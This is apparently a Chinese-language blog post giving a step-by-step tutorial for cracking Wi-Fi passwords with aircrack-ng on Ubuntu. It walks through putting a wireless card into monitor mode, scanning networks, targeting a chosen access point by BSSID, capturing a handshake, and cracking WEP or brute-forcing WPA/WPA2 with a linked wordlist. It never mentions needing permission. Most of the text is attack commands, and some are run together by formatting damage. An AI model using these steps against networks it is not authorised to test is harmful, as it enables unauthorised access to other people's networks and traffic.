你的位置:首页 > 操作系统

[操作系统]Aircrack


测试环境在linux平台下,我用的是ubuntu环境。ubuntu安装可以直接用sudo apt-get install aircrack-ng

linux应该可以用yum -y install  aircrack-ng 来安装,如果下载它的安装包,没有fangqian的话,非常慢。

------------------------------------------------------------------------------------

方法:

1.确保你的无线是打开的:ifconfig看是否有wlan0或别的无线适配器已经启动,如果没有,后面的步骤都执行不了

  可以先用ifconfig -a看是否有无线适配器,再用ifconfig wlan0 up命令启动无线适配器(wlan0为ifconfig -a中查找到的无线适配器名称) 

2.激活网卡为监听模式:

sudo airmon-ng start wlan0

3.查看无线网络,开始抓取无线数据包

sudo airodump-ng mon0 

注意:这里的mon0是你的wlan开始监听之后的别名,一般可能会出现的问题是:

rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network

如果出现这个问题,按照这个来解决

sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upsudo airodump-ng wlan0

或者:

airmon-ng check killairmon-ng start <interface>airodump-ng wlan0mon

不过网络管理给关掉了

sudo servicenetwork-manager stop # 停止 nm服务udo servicenetwork-manager start # 开启 nm服务

如果一切没有问题====》

这时就会显示你当前可以搜索到的无线信号,PWR是信号值,数值越大表示信号越强,ESSID就是这个信号的名称.ENC为加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)

找到一个你希望破解的essid

4.确定目标后

sudo airodump-ng -c 6 --bssid target's MAC -w file mon0

-c 6是指这个信号的频道 ,就是CH那个频道

target's MAC 是你想要破解的MAC地址

file 是aircrack-ng 跟目标地址握手后保存的数据

5.收到足够的包之后(即data),开始破解

sudo aircrack-ng file-01.cap

file-01.cap 就是握手后保存的数据

如果是wep类型的密码,在收到足够多的包之后(1w)可以直接破解

如果是wpa/wpa2类型的加密方式,则必须收到握手包之后才能开始暴力破解并且需要使用密码文件(给出一个地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密码足够复杂的话这样的密码文件也是不够的,需要自己去下更复杂的加密文件

sudo aircrack-ng -w dic file-01.cap

破解成功就能拿到密码了